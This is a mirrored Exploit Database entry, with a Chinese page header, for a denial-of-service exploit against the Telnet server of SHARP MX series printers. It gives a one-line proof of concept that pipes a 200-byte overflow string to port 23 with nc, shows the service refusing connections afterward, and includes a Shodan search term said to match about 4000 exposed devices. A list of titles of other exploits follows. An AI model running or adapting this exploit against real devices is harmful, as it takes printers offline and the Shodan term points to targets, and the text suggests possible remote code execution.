SHARP MX Series – Denial of Service

Exploit Database
21 阅读

作者： pws

日期： 2014-08-09
类别：
- dos
平台：
- hardware
来源：https://www.exploit-db.com/exploits/34306/

# Exploit Title: SHARP MX Series - Denial Of Service
# Date: 08/08/2014
# Exploit Author: pws
# Vendor Homepage: Sharp Printers
# Firmware Link: Not found
# Tested on: Latest version
# Shodan d0rk: "SHARP Telnet server" ~4000 devices
# CVE : None yet

$ python -c 'print "A"*200 + "\n"' | nc 192.168.30.5 23

$ telnet 192.168.30.5 23
Trying 192.168.30.5 23...
telnet: Unable to connect to remote host: Connection refused

This vulnerability leads to a Denial of Service vulnerability. 

Unfortunately, we were unable to retrieve the core dumped but 
this flaw might result in a Buffer Overflow allowing remote command execution.

last Exploits
SHARP MX Series – Denial of Service的更多信息

Google Chrome 73.0.3683.103 – ‘WasmMemoryObject::Grow’ Use-After-Free：
G DATA Total Security 25.4.0.3 – Activex Buffer Overflow：
Apple QuickTime 7.7.2 – Targa image Buffer Overflow：
PHP 5.0.0 – ‘simplexml_load_file()’ Local Denial of Service：
LG MRA58K – ‘ASFParser::SetMetaData’ Stack Overflow：
jetVideo 8.1.1 – Basic ‘.wav’ Local Crash (PoC)：
T-Mobile Internet Manager – Contact Name Crash (PoC)：
Plotwn 18 – ‘.wp2’ Local Buffer Overflow (PoC)：